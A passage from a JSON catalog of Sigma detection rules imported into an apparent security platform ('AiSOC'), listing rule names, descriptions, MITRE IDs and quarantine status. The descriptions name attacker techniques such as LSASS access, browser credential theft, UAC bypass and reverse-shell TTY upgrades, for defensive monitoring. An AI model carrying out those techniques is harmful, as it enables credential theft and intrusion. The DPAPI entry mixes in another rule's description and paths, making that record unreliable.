"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml" } }, { "id": "sigmahq-sigma-45d3a03d-f441-458c-8883-df101a3bb146", "type": "detection", "name": "Launch-VsDevShell.PS1 Proxy Execution", "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/launch-vsdevshell-ps1-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45d3a03d-f441-458c-8883-df101a3bb146", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" } }, { "id": "sigmahq-sigma-45e112d0-7759-4c2a-aa36-9f8fb79d3393", "type": "detection", "name": "IE Change Domain Zone", "description": "Hides the file extension through modification of the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie-change-domain-zone.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_security_zones.yml" } }, { "id": "sigmahq-sigma-460479f3-80b7-42da-9c43-2cc1d54dbccd", "type": "detection", "name": "Creation of a Local Hidden User Account by Registry", "description": "Sysmon registry detection of a local hidden user account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-a-local-hidden-user-account-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" } }, { "id": "sigmahq-sigma-46123129-1024-423e-9fae-43af4a0fa9a5", "type": "detection", "name": "File Download Via Windows Defender MpCmpRun.EXE", "description": "Detects the use of Windows Defender MpCmdRun.EXE to download files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/file-download-via-windows-defender-mpcmprun-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46123129-1024-423e-9fae-43af4a0fa9a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml" } }, { "id": "sigmahq-sigma-4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "type": "detection", "name": "HackTool - Impacket Tools Execution", "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-impacket-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml" } }, { "id": "sigmahq-sigma-46490193-1b22-4c29-bdd6-5bf63907216f", "type": "detection", "name": "VBScript Payload Stored in Registry", "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vbscript-payload-stored-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46490193-1b22-4c29-bdd6-5bf63907216f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" } }, { "id": "sigmahq-sigma-46530378-f9db-4af9-a9e5-889c177d3881", "type": "detection", "name": "Azure Device or Configuration Modified or Deleted", "description": "Identifies when a device or device configuration in azure is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-device-or-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46530378-f9db-4af9-a9e5-889c177d3881", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-46612ae6-86be-4802-bc07-39b59feb1309", "type": "detection", "name": "Access To Windows DPAPI Master Keys By Uncommon Applications", "description": "Detects 
file access requests to the Windows Data Protection API Master keys by an uncommon application.
This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusion-list-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46a68649-f218-4f86-aea1-16a759d81820", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml" } }, { "id": "sigmahq-sigma-46dd5308-4572-4d12-aa43-8938f0184d4f", "type": "detection", "name": "Bypass UAC Using DelegateExecute", "description": "Bypasses User Account Control using a fileless method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-using-delegateexecute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" } }, { "id": "sigmahq-sigma-470ec5fa-7b4e-4071-b200-4c753100f49b", "type": "detection", "name": "Failed Code Integrity Checks", "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/failed-code-integrity-checks.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "470ec5fa-7b4e-4071-b200-4c753100f49b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml" } }, { "id": "sigmahq-sigma-47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "type": "detection", "name": "Potential Browser Data Stealing", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-browser-data-stealing.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml" } }, { "id": "sigmahq-sigma-4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "type": "detection", "name": "Scheduled TaskCache Change by Uncommon Program", "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-taskcache-change-by-uncommon-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" } }, { "id": "sigmahq-sigma-472159c5-31b9-4f56-b794-b766faa8b0a7", "type": "detection", "name": "Suspicious LSASS Access Via MalSecLogon", "description": "Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lsass-access-via-malseclogon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml" } }, { "id": "sigmahq-sigma-4782eb5a-a513-4523-a0ac-f3082b26ac5c", "type": "detection", "name": "Mshtml.DLL RunHTMLApplication Suspicious Usage", "description": "Detects execution of commands that leverage the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mshtml-dll-runhtmlapplication-suspicious-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" } }, { "id": "sigmahq-sigma-47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "type": "detection", "name": "Shell Execution via Git - Linux", "description": "Detects the use of the \"git\" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-git-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47b3bbd4-1bf7-48cc-84ab-995362aaa75a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml" } }, { "id": "sigmahq-sigma-47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "type": "detection", "name": "Potential XCSSET Malware Infection", "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. 
Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xcsset-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" } }, { "id": "sigmahq-sigma-47e4bab7-c626-47dc-967b-255608c9a920", "type": "detection", "name": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\nThis was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/permission-misconfiguration-reconnaissance-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "47e4bab7-c626-47dc-967b-255608c9a920", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" } }, { "id": "sigmahq-sigma-480421f9-417f-4d3b-9552-fd2728443ec8", "type": "detection", "name": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-windows-nt-currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "480421f9-417f-4d3b-9552-fd2728443ec8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" } }, { "id": "sigmahq-sigma-4809c683-059b-4935-879d-36835986f8cf", "type": "detection", "name": "System Information Discovery Using System_Profiler", "description": "Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\nThis process is primarily used for system information discovery. 
However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1497.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-system-profiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4809c683-059b-4935-879d-36835986f8cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml" } }, { "id": "sigmahq-sigma-480e7e51-e797-47e3-8d72-ebfce65b6d8d", "type": "detection", "name": "Python Spawning Pretty TTY on Windows", "description": "Detects python spawning a pseudo-terminal (pty), a common step in upgrading a limited reverse shell to an interactive one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-spawning-pretty-tty-on-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" } }, { "id": 
"sigmahq-sigma-4833155a-4053-4c9c-a997-777fcea0baa7", "type": "detection", "name": "SQLite Firefox Profile Data DB Access", "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1539", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sqlite-firefox-profile-data-db-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4833155a-4053-4c9c-a997-777fcea0baa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" } }, { "id": "sigmahq-sigma-48437c39-9e5f-47fb-af95-3d663c3f2919", "type": "detection", "name": "UAC Disabled", "description": "Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/uac-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_uac_disable.yml" } }, { "id": "sigmahq-sigma-48739819-8230-4ee3-a8ea-e0289d1fb0ff", "type": "detection", "name": "Azure Active Directory Hybrid Health AD FS Service Delete", "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-active-directory-hybrid-health-ad-fs-service-delete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml" } }, { "id": "sigmahq-sigma-487bb375-12ef-41f6-baae-c6a1572b4dd1", "type": "detection", "name": "Potential Persistence Via Outlook Today Page", "description": "Detects potential persistence activity via the Outlook Today page.\nAn attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-today-page.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml" } }, { "id": "sigmahq-sigma-487c7524-f892-4054-b263-8a0ace63fc25", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - System", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "487c7524-f892-4054-b263-8a0ace63fc25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml" } }, { "id": "sigmahq-sigma-488b44e7-3781-4a71-888d-c95abfacf44d", "type": "detection", "name": "Windows Firewall Profile Disabled", "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-firewall-profile-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "488b44e7-3781-4a71-888d-c95abfacf44d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" } }, { "id": "sigmahq-sigma-48917adc-a28e-4f5d-b729-11e75da8941f", "type": "detection", "name": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-defender-folder-exclusion-added-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48917adc-a28e-4f5d-b729-11e75da8941f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" } }, { "id": 
"sigmahq-sigma-48a45d45-8112-416b-8a67-46e03a4b2107", "type": "detection", "name": "Remove Account From Domain Admin Group", "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-account-from-domain-admin-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48a45d45-8112-416b-8a67-46e03a4b2107", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" } }, { "id": "sigmahq-sigma-48a61b29-389f-4032-b317-b30de6b95314", "type": "detection", "name": "Suspicious Plink Port Forwarding", "description": "Detects suspicious Plink tunnel port forwarding to a local port", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-plink-port-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48a61b29-389f-4032-b317-b30de6b95314", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml" } }, { "id": "sigmahq-sigma-48bbc537-b652-4b4e-bd1d-281172df448f", "type": "detection", "name": "Sysinternals PsSuspend Execution", "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-pssuspend-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48bbc537-b652-4b4e-bd1d-281172df448f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 